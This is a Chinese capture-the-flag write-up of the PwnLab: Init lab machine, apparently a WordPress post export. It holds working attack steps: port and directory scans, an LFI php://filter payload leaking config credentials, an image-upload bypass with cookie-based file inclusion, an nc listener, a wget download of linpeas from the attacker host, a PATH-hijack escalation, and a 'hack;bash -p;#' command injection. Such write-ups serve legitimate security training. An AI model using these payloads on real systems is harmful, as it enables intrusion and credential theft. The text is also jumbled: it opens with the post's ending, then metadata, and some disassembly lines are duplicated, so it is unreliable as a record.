0x80485c4<\/code>\u5e76\u5c06\u7ed3\u679c\u5b57\u7b26\u4e32\u5b58\u50a8\u5728[ebp-0xc]<\/code>( asprintf<\/code>)<\/li>\n0x80485c4<\/code>\uff1a\/bin\/echo %s >> \/root\/messages.txt<\/code><\/li>\nasprintf<\/code>\u8c03\u7528\u8c03\u7528 system<\/code>\u4ea7\u751f\u7684\u5b57\u7b26\u4e32<\/li>\n<\/ul>\n\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
.\/msg2root\nhack;bash -p;#<\/code><\/pre>\n<\/div><\/p>\n\u83b7\u5f97\u5230\u4e86flag\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"
PWNLAB: INIT \u770b\u4e0a\u53bb\u4f3c\u4e4e\u5f88\u53cb\u5584\uff0c\u6253\u5f00\u770b\u4e00\u4e0b\uff0c\u548c\u4ee5\u524d\u4e00\u6837\uff0c\u91c7\u7528NAT\u6a21\u5f0f\u4f7f\u7528\uff1a \u626b\u4e00\u4e0b\uff1a \u53c8\u662f\u98ce\u5e73\u6d6a […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24],"tags":[],"class_list":["post-376","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/376","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=376"}],"version-history":[{"count":2,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/376\/revisions"}],"predecessor-version":[{"id":378,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/376\/revisions\/378"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=376"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=376"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=376"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
rustscan -a 192.168.244.134 -- -A -sV -sT<\/code><\/pre>\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 192.168.244.134:80\nOpen 192.168.244.134:111\nOpen 192.168.244.134:3306\nOpen 192.168.244.134:44194\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-02-22 21:34 EST\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nInitiating Ping Scan at 21:34\nScanning 192.168.244.134 [2 ports]\nCompleted Ping Scan at 21:34, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 21:34\nCompleted Parallel DNS resolution of 1 host. at 21:34, 4.24s elapsed\nDNS resolution of 1 IPs took 4.24s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0]\nInitiating Connect Scan at 21:34\nScanning 192.168.244.134 [4 ports]\nDiscovered open port 80\/tcp on 192.168.244.134\nDiscovered open port 111\/tcp on 192.168.244.134\nDiscovered open port 3306\/tcp on 192.168.244.134\nDiscovered open port 44194\/tcp on 192.168.244.134\nCompleted Connect Scan at 21:34, 0.00s elapsed (4 total ports)\nInitiating Service scan at 21:34\nScanning 4 services on 192.168.244.134\nCompleted Service scan at 21:34, 11.05s elapsed (4 services on 1 host)\nNSE: Script scanning 192.168.244.134.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.16s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.02s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nNmap scan report for 192.168.244.134\nHost is up, received syn-ack (0.00058s latency).\nScanned at 2024-02-22 21:34:13 EST for 11s\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack Apache httpd 2.4.10 ((Debian))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.10 (Debian)\n|_http-title: PwnLab Intranet Image Hosting\n111\/tcp open rpcbind syn-ack 2-4 (RPC #100000)\n| rpcinfo: \n| program version port\/proto service\n| 100000 2,3,4 111\/tcp rpcbind\n| 100000 2,3,4 111\/udp rpcbind\n| 100000 3,4 111\/tcp6 rpcbind\n| 100000 3,4 111\/udp6 rpcbind\n| 100024 1 40471\/udp6 status\n| 100024 1 44194\/tcp status\n| 100024 1 48585\/udp status\n|_ 100024 1 57355\/tcp6 status\n3306\/tcp open mysql syn-ack MySQL 5.5.47-0+deb8u1\n| mysql-info: \n| Protocol: 10\n| Version: 5.5.47-0+deb8u1\n| Thread ID: 40\n| Capabilities flags: 63487\n| Some Capabilities: Support41Auth, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, SupportsTransactions, LongPassword, SupportsLoadDataLocal, IgnoreSigpipes, Speaks41ProtocolNew, ConnectWithDatabase, DontAllowDatabaseTableColumn, SupportsCompression, InteractiveClient, ODBCClient, LongColumnFlag, FoundRows, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins\n| Status: Autocommit\n| Salt: `MA<J=3&cDfW_Wvl<'L*\n|_ Auth Plugin Name: mysql_native_password\n44194\/tcp open status syn-ack 1 (RPC #100024)\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 21:34\nCompleted NSE at 21:34, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 16.50 seconds<\/code><\/pre>\n\u8bbf\u95ee\u4e00\u4e0b<\/h3>\n
<\/div><\/p>\n<\/div><\/p>\n\u5c1d\u8bd5\u4e07\u80fd\u5bc6\u7801\uff0c\u4f46\u662f\u767b\u5f55\u5931\u8d25\u4e86\uff01<\/p>\n
<\/div><\/p>\nWappalyzer<\/h3>\n
<\/div><\/p>\n\u9605\u8bfb\u4e00\u4e0b\u6e90\u7801\uff0c\u770b\u770b\u6709\u6ca1\u6709\u6536\u83b7\uff0c\u4f46\u662f\u6ca1\u53d1\u73b0\u5565\u6709\u7528\u7684\u4e1c\u897f\uff01<\/p>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\ngobuster dir -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -u http:\/\/192.168.244.134 -f -t 200<\/code><\/pre>\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.244.134\n[+] Method: GET\n[+] Threads: 200\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Add Slash: true\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/upload\/ (Status: 200) [Size: 744]\n\/images\/ (Status: 200) [Size: 944]\n\/icons\/ (Status: 403) [Size: 296]\n\/server-status\/ (Status: 403) [Size: 304]\nProgress: 220560 \/ 220561 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6211\u4eec\u518d\u770b\u4e00\u4e0b\u6709\u5565\u4fe1\u606f\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\nNikto<\/h3>\nnikto -h http:\/\/192.168.244.134<\/code><\/pre>\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP: 192.168.244.134\n+ Target Hostname: 192.168.244.134\n+ Target Port: 80\n+ Start Time: 2024-02-22 22:24:38 (GMT-5)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.10 (Debian)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\n+ \/images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP\/1.0. The value is "127.0.0.1". See: http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2000-0649\n+ Apache\/2.4.10 appears to be outdated (current is at least Apache\/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.\n+ \/login.php: Cookie PHPSESSID created without the httponly flag. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Cookies\n+ \/: Web Server returns a valid response with junk HTTP methods which may cause false positives.\n+ \/config.php: PHP Config file may contain database IDs and passwords.\n+ \/images\/: Directory indexing found.\n+ \/icons\/README: Apache default file found. See: https:\/\/www.vntweb.co.uk\/apache-restricting-access-to-iconsreadme\/\n+ \/login.php: Admin login page\/section found.\n+ \/#wp-config.php#: #wp-config.php# file found. This file contains the credentials.\n+ 8102 requests: 0 error(s) and 11 item(s) reported on remote host\n+ End Time: 2024-02-22 22:24:55 (GMT-5) (17 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n\u6f0f\u6d1e\u5229\u7528<\/h2>\nLFI<\/h3>\n
\u626b\u51fa\u6765\u7684\u4e1c\u897f\u611f\u89c9\u6bd4\u8f83\u5c11\uff0c\u4f46\u662f\u4e5f\u8fd8\u6709\u7528\uff0c\u518d\u770b\u770b\u6709\u5565\u5229\u7528\u7684\u5730\u65b9\uff1a<\/p>\n
<\/div><\/p>\n\u56fe\u7247\u4e5f\u6ca1\u6709\u9690\u5199\u3002<\/p>\n
\u518d\u6b21\u67e5\u627e\uff0c\u770b\u5230\u51e0\u4e2a\u7f51\u5740\u597d\u50cf\u53ef\u4ee5\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff1a<\/p>\n
http:\/\/192.168.244.134\/?page=login\nhttp:\/\/192.168.244.134\/?page=upload<\/code><\/pre>\n\u53ef\u4ee5\u5c1d\u8bd5LFI<\/code>\u5229\u7528\uff1a<\/p>\nhttp:\/\/192.168.244.134\/?page=php:\/\/filter\/read=convert.base64-encode\/resource=login<\/code><\/pre>\n<\/div><\/p>\n\u770b\u6765\u5c31\u53ef\u4ee5\u4f7f\u7528\u4e86\uff0c\u89e3\u7801\u4e00\u4e0b\uff1a<\/p>\n
PD9waHANCnNlc3Npb25fc3RhcnQoKTsNCnJlcXVpcmUoImNvbmZpZy5waHAiKTsNCiRteXNxbGkgPSBuZXcgbXlzcWxpKCRzZXJ2ZXIsICR1c2VybmFtZSwgJHBhc3N3b3JkLCAkZGF0YWJhc2UpOw0KDQppZiAoaXNzZXQoJF9QT1NUWyd1c2VyJ10pIGFuZCBpc3NldCgkX1BPU1RbJ3Bhc3MnXSkpDQp7DQoJJGx1c2VyID0gJF9QT1NUWyd1c2VyJ107DQoJJGxwYXNzID0gYmFzZTY0X2VuY29kZSgkX1BPU1RbJ3Bhc3MnXSk7DQoNCgkkc3RtdCA9ICRteXNxbGktPnByZXBhcmUoIlNFTEVDVCAqIEZST00gdXNlcnMgV0hFUkUgdXNlcj0\/IEFORCBwYXNzPT8iKTsNCgkkc3RtdC0+YmluZF9wYXJhbSgnc3MnLCAkbHVzZXIsICRscGFzcyk7DQoNCgkkc3RtdC0+ZXhlY3V0ZSgpOw0KCSRzdG10LT5zdG9yZV9SZXN1bHQoKTsNCg0KCWlmICgkc3RtdC0+bnVtX3Jvd3MgPT0gMSkNCgl7DQoJCSRfU0VTU0lPTlsndXNlciddID0gJGx1c2VyOw0KCQloZWFkZXIoJ0xvY2F0aW9uOiA\/cGFnZT11cGxvYWQnKTsNCgl9DQoJZWxzZQ0KCXsNCgkJZWNobyAiTG9naW4gZmFpbGVkLiI7DQoJfQ0KfQ0KZWxzZQ0Kew0KCT8+DQoJPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+DQoJPGxhYmVsPlVzZXJuYW1lOiA8L2xhYmVsPjxpbnB1dCBpZD0idXNlciIgdHlwZT0idGVzdCIgbmFtZT0idXNlciI+PGJyIC8+DQoJPGxhYmVsPlBhc3N3b3JkOiA8L2xhYmVsPjxpbnB1dCBpZD0icGFzcyIgdHlwZT0icGFzc3dvcmQiIG5hbWU9InBhc3MiPjxiciAvPg0KCTxpbnB1dCB0eXBlPSJzdWJtaXQiIG5hbWU9InN1Ym1pdCIgdmFsdWU9IkxvZ2luIj4NCgk8L2Zvcm0+DQoJPD9waHANCn0NCg==<\/code><\/pre>\n<?php\nsession_start();\nrequire("config.php");\n$mysqli = new mysqli($server, $username, $password, $database);\n\nif (isset($_POST['user']) and isset($_POST['pass']))\n{\n $luser = $_POST['user'];\n $lpass = base64_encode($_POST['pass']);\n\n $stmt = $mysqli->prepare("SELECT * FROM users WHERE user=? AND pass=?");\n $stmt->bind_param('ss', $luser, $lpass);\n\n $stmt->execute();\n $stmt->store_Result();\n\n if ($stmt->num_rows == 1)\n {\n $_SESSION['user'] = $luser;\n header('Location: ?page=upload');\n }\n else\n {\n echo "Login failed.";\n }\n}\nelse\n{\n ?>\n <form action="" method="POST">\n <label>Username: <\/label><input id="user" type="test" name="user"><br \/>\n <label>Password: <\/label><input id="pass" type="password" name="pass"><br \/>\n <input type="submit" name="submit" value="Login">\n <\/form>\n <?php\n}<\/code><\/pre>\n\u53d1\u73b0\u5305\u542b\u4e86\u4e00\u4e2acookie=lang<\/code>\uff1a<\/p>\n<\/div><\/p>\nhttp:\/\/192.168.244.134\/?page=php:\/\/filter\/read=convert.base64-encode\/resource=config<\/code><\/pre>\n<\/div><\/p>\nPD9waHANCiRzZXJ2ZXIJICA9ICJsb2NhbGhvc3QiOw0KJHVzZXJuYW1lID0gInJvb3QiOw0KJHBhc3N3b3JkID0gIkg0dSVRSl9IOTkiOw0KJGRhdGFiYXNlID0gIlVzZXJzIjsNCj8+<\/code><\/pre>\n<?php\n$server = "localhost";\n$username = "root";\n$password = "H4u%QJ_H99";\n$database = "Users";\n?><\/code><\/pre>\n\u627e\u5230\u4e86\u8d26\u53f7\u5bc6\u7801\uff01\uff01<\/p>\n
http:\/\/192.168.244.134\/?page=php:\/\/filter\/convert.base64-encode\/resource=..\/..\/..\/..\/..\/etc\/passwd\n# \u65e0\u56de\u663e<\/code><\/pre>\n\u5c1d\u8bd5\u767b\u5f55\u6570\u636e\u5e93\uff1a<\/p>\n
mysql -uroot -pH4u%QJ_H99 -h 192.168.244.134\nWelcome to the MariaDB monitor. Commands end with ; or \\g.\nYour MySQL connection id is 73\nServer version: 5.5.47-0+deb8u1 (Debian)\n\nCopyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.\n\nType 'help;' or '\\h' for help. Type '\\c' to clear the current input statement.\n\nMySQL [(none)]> show databases;\n+--------------------+\n| Database |\n+--------------------+\n| information_schema |\n| Users |\n+--------------------+\n2 rows in set (0.001 sec)\n\nMySQL [(none)]> use Users;\nReading table information for completion of table and column names\nYou can turn off this feature to get a quicker startup with -A\n\nDatabase changed\nMySQL [Users]> show tables;\n+-----------------+\n| Tables_in_Users |\n+-----------------+\n| users |\n+-----------------+\n1 row in set (0.001 sec)\n\nMySQL [Users]> select * from users;\n+------+------------------+\n| user | pass |\n+------+------------------+\n| kent | Sld6WHVCSkpOeQ== |\n| mike | U0lmZHNURW42SQ== |\n| kane | aVN2NVltMkdSbw== |\n+------+------------------+\n3 rows in set (0.002 sec)<\/code><\/pre>\n\u89e3\u7801\u7ed3\u679c\uff1a<\/p>\n
+------+------------------------------+\n| user | pass |\n+------+------------------------------+\n| kent | Sld6WHVCSkpOeQ==(JWzXuBJJNy) |\n| mike | U0lmZHNURW42SQ==(SIfdsTEn6I) |\n| kane | aVN2NVltMkdSbw==(iSv5Ym2GRo) |\n+------+------------------------------+<\/code><\/pre>\n\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff0c\u6210\u529f\u8fdb\u5165\uff1a<\/p>\n
<\/div><\/p>\n\u200b \u67e5\u770b\u4e00\u4e0b\u4e0a\u4f20\u7684\u4ee3\u7801\uff1a<\/p>\n
http:\/\/192.168.244.134\/?page=php:\/\/filter\/read=convert.base64-encode\/resource=upload<\/code><\/pre>\nPD9waHANCnNlc3Npb25fc3RhcnQoKTsNCmlmICghaXNzZXQoJF9TRVNTSU9OWyd1c2VyJ10pKSB7IGRpZSgnWW91IG11c3QgYmUgbG9nIGluLicpOyB9DQo\/Pg0KPGh0bWw+DQoJPGJvZHk+DQoJCTxmb3JtIGFjdGlvbj0nJyBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnPg0KCQkJPGlucHV0IHR5cGU9J2ZpbGUnIG5hbWU9J2ZpbGUnIGlkPSdmaWxlJyAvPg0KCQkJPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0nc3VibWl0JyB2YWx1ZT0nVXBsb2FkJy8+DQoJCTwvZm9ybT4NCgk8L2JvZHk+DQo8L2h0bWw+DQo8P3BocCANCmlmKGlzc2V0KCRfUE9TVFsnc3VibWl0J10pKSB7DQoJaWYgKCRfRklMRVNbJ2ZpbGUnXVsnZXJyb3InXSA8PSAwKSB7DQoJCSRmaWxlbmFtZSAgPSAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXTsNCgkJJGZpbGV0eXBlICA9ICRfRklMRVNbJ2ZpbGUnXVsndHlwZSddOw0KCQkkdXBsb2FkZGlyID0gJ3VwbG9hZC8nOw0KCQkkZmlsZV9leHQgID0gc3RycmNocigkZmlsZW5hbWUsICcuJyk7DQoJCSRpbWFnZWluZm8gPSBnZXRpbWFnZXNpemUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddKTsNCgkJJHdoaXRlbGlzdCA9IGFycmF5KCIuanBnIiwiLmpwZWciLCIuZ2lmIiwiLnBuZyIpOyANCg0KCQlpZiAoIShpbl9hcnJheSgkZmlsZV9leHQsICR3aGl0ZWxpc3QpKSkgew0KCQkJZGllKCdOb3QgYWxsb3dlZCBleHRlbnNpb24sIHBsZWFzZSB1cGxvYWQgaW1hZ2VzIG9ubHkuJyk7DQoJCX0NCg0KCQlpZihzdHJwb3MoJGZpbGV0eXBlLCdpbWFnZScpID09PSBmYWxzZSkgew0KCQkJZGllKCdFcnJvciAwMDEnKTsNCgkJfQ0KDQoJCWlmKCRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvZ2lmJyAmJiAkaW1hZ2VpbmZvWydtaW1lJ10gIT0gJ2ltYWdlL2pwZWcnICYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvanBnJyYmICRpbWFnZWluZm9bJ21pbWUnXSAhPSAnaW1hZ2UvcG5nJykgew0KCQkJZGllKCdFcnJvciAwMDInKTsNCgkJfQ0KDQoJCWlmKHN1YnN0cl9jb3VudCgkZmlsZXR5cGUsICcvJyk+MSl7DQoJCQlkaWUoJ0Vycm9yIDAwMycpOw0KCQl9DQoNCgkJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gbWQ1KGJhc2VuYW1lKCRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkuJGZpbGVfZXh0Ow0KDQoJCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkdXBsb2FkZmlsZSkpIHsNCgkJCWVjaG8gIjxpbWcgc3JjPVwiIi4kdXBsb2FkZmlsZS4iXCI+PGJyIC8+IjsNCgkJfSBlbHNlIHsNCgkJCWRpZSgnRXJyb3IgNCcpOw0KCQl9DQoJfQ0KfQ0KDQo\/Pg==<\/code><\/pre>\n<?php\nsession_start();\nif (!isset($_SESSION['user'])) { die('You must be log in.'); }\n?>\n<html>\n <body>\n <form action='' method='post' enctype='multipart\/form-data'>\n <input type='file' name='file' id='file' \/>\n <input type='submit' name='submit' value='Upload'\/>\n <\/form>\n <\/body>\n<\/html>\n<?php \nif(isset($_POST['submit'])) {\n if ($_FILES['file']['error'] <= 0) {\n $filename = $_FILES['file']['name'];\n $filetype = $_FILES['file']['type'];\n $uploaddir = 'upload\/';\n $file_ext = strrchr($filename, '.');\n $imageinfo = getimagesize($_FILES['file']['tmp_name']);\n $whitelist = array(".jpg",".jpeg",".gif",".png"); \n\n if (!(in_array($file_ext, $whitelist))) {\n die('Not allowed extension, please upload images only.');\n }\n\n if(strpos($filetype,'image') === false) {\n die('Error 001');\n }\n\n if($imageinfo['mime'] != 'image\/gif' && $imageinfo['mime'] != 'image\/jpeg' && $imageinfo['mime'] != 'image\/jpg'&& $imageinfo['mime'] != 'image\/png') {\n die('Error 002');\n }\n\n if(substr_count($filetype, '\/')>1){\n die('Error 003');\n }\n\n $uploadfile = $uploaddir . md5(basename($_FILES['file']['name'])).$file_ext;\n\n if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {\n echo "<img src=\\"".$uploadfile."\\"><br \/>";\n } else {\n die('Error 4');\n }\n }\n}\n\n?><\/code><\/pre>\n\u53d1\u73b0\u6587\u4ef6\u9650\u5236\u4f20.jpg,.jpeg,.gif,.png<\/code>\u51e0\u79cd\u6587\u4ef6\uff0c\u4fee\u6539\u4e00\u4e0b\u5c1d\u8bd5\u4e0a\u4f20\uff1a<\/p>\n<\/div><\/p>\n\u5728\u6587\u4ef6\u5934\u52a0\u4e0aGIFa89<\/code>\uff1a<\/p>\n<\/div><\/p>\n<\/div><\/p>\ncurl 192.168.244.134 -H "cookie:lang=..\/upload\/e4919f92b26f69d7e89d2ef400c78a97.gif"\n\nnc -lvp 1234<\/code><\/pre>\n\u63d0\u6743<\/h2>\nwhoami\nid\npython -c 'import pty; pty.spawn("\/bin\/sh")'<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e9b\u6709\u65e0root<\/code>\u6743\u9650\u7528\u6237\uff1a<\/p>\n<\/div><\/p>\n# kali\npython3 -m http.server 8888\n# kane\ncd \/tmp\nwget http:\/\/192.168.244.128:8888\/linpeas.sh\nchmod +x linpeas.sh<\/code><\/pre>\n\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff0c\u770b\u5230\u4e86\u4e00\u4e2a\u6709\u8da3\u7684SUID<\/code>\uff1a<\/p>\n<\/div><\/p>\n<\/div><\/p>\n\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
cd \/home\/kane\nls -la\n# total 32\n# drwxr-x--- 3 kane kane 4096 Feb 22 23:56 .\n# drwxr-xr-x 6 root root 4096 Mar 17 2016 ..\n# -rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout\n# -rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc\n# drwx------ 2 kane kane 4096 Feb 22 23:56 .gnupg\n# -rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike\n# -rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile\n.\/msgmike\n# cat: \/home\/mike\/msg.txt: No such file or directory\necho $PATH\n# \/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games<\/code><\/pre>\nfind \/ -perm -u=s -type f 2>\/dev\/null\n# \/bin\/mount\n# \/bin\/su\n# \/bin\/umount\n# \/sbin\/mount.nfs\n# \/home\/kane\/msgmike\n# \/usr\/bin\/newgrp\n# \/usr\/bin\/chfn\n# \/usr\/bin\/at\n# \/usr\/bin\/passwd\n# \/usr\/bin\/procmail\n# \/usr\/bin\/chsh\n# \/usr\/bin\/gpasswd\n# \/usr\/lib\/eject\/dmcrypt-get-device\n# \/usr\/lib\/pt_chown\n# \/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n# \/usr\/lib\/openssh\/ssh-keysign\n# \/usr\/sbin\/exim4<\/code><\/pre>\n\u770b\u6765\u5f97\u83b7\u5f97\u4e00\u4e2amike<\/code>\u7528\u6237\u7684shell\uff1a<\/p>\necho bash -p > cat\nchmod 777 cat\nPATH=.:$PATH .\/msgmike<\/code><\/pre>\n<\/div><\/p>\n\u6211\u4eec\u5c1d\u8bd5\u4f20\u5230\u672c\u5730\u8fdb\u884c\u5206\u6790\u4e00\u4e0b\uff1a<\/p>\n
# mike\npython -m SimpleHTTPServer 8877\n\n# kali\nwget http:\/\/192.168.244.134:8877\/msg2root<\/code><\/pre>\n\u4f7f\u7528\u76f8\u5173\u5de5\u5177\u7b80\u5355\u5206\u6790\u4e00\u4e0b\u8fd9\u4e2a\u6587\u4ef6\uff0c\u6216\u8005\u4f7f\u7528IDA<\/code>\u8fdb\u884c\u5206\u6790\uff1a<\/p>\nobjdump -D -M intel msg2root | less<\/code><\/pre>\n\u5206\u6790\u4e00\u4e0b\u4e3b\u51fd\u6570\uff1a<\/p>\n
080484ab <main>:\n 80484ab: 8d 4c 24 04 lea ecx,[esp+0x4]\n 80484af: 83 e4 f0 and esp,0xfffffff0\n 80484b2: ff 71 fc push DWORD PTR [ecx-0x4]\n 80484b5: 55 push ebp\n 80484b6: 89 e5 mov ebp,esp\n 80484b8: 51 push ecx\n 80484b9: 83 ec 74 sub esp,0x74\n 80484bc: 83 ec 0c sub esp,0xc\n 80484bf: 68 b0 85 04 08 push 0x80485b0\n 80484c4: e8 87 fe ff ff call 8048350 <printf@plt>\n 80484c9: 83 c4 10 add esp,0x10\n 80484cc: a1 f4 97 04 08 mov eax,ds:0x80497f4\n 80484d1: 83 ec 04 sub esp,0x4\n 80484d4: 50 push eax\n 80484c9: 83 c4 10 add esp,0x10\n 80484cc: a1 f4 97 04 08 mov eax,ds:0x80497f4\n 80484d1: 83 ec 04 sub esp,0x4\n 80484d4: 50 push eax\n 80484d5: 6a 64 push 0x64\n 80484d7: 8d 45 90 lea eax,[ebp-0x70]\n 80484da: 50 push eax\n 80484db: e8 80 fe ff ff call 8048360 <fgets@plt>\n 80484e0: 83 c4 10 add esp,0x10\n 80484e3: 83 ec 04 sub esp,0x4\n 80484e6: 8d 45 90 lea eax,[ebp-0x70]\n 80484e9: 50 push eax\n 80484ea: 68 c4 85 04 08 push 0x80485c4\n 80484ef: 8d 45 f4 lea eax,[ebp-0xc]\n 80484f2: 50 push eax\n 80484f3: e8 a8 fe ff ff call 80483a0 <asprintf@plt>\n 80484f8: 83 c4 10 add esp,0x10\n 80484fb: 8b 45 f4 mov eax,DWORD PTR [ebp-0xc]\n 80484fe: 83 ec 0c sub esp,0xc\n 8048501: 50 push eax\n 8048502: e8 69 fe ff ff call 8048370 <system@plt>\n 8048507: 83 c4 10 add esp,0x10\n 804850a: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]\n 804850d: c9 leave\n 804850e: 8d 61 fc lea esp,[ecx-0x4]\n 8048511: c3 ret\n 8048512: 66 90 xchg ax,ax\n 8048514: 66 90 xchg ax,ax\n 8048516: 66 90 xchg ax,ax\n 8048518: 66 90 xchg ax,ax\n 804851a: 66 90 xchg ax,ax\n 804851c: 66 90 xchg ax,ax\n 804851e: 66 90 xchg ax,ax<\/code><\/pre>\nobjdump -s -j .rodata msg2root<\/code><\/pre>\nmsg2root: file format elf32-i386\nContents of section .rodata:\n 80485a8 03000000 01000200 4d657373 61676520 ........Message \n 80485b8 666f7220 726f6f74 3a200000 2f62696e for root: ..\/bin\n 80485c8 2f656368 6f202573 203e3e20 2f726f6f \/echo %s >> \/roo\n 80485d8 742f6d65 73736167 65732e74 787400 t\/messages.txt. 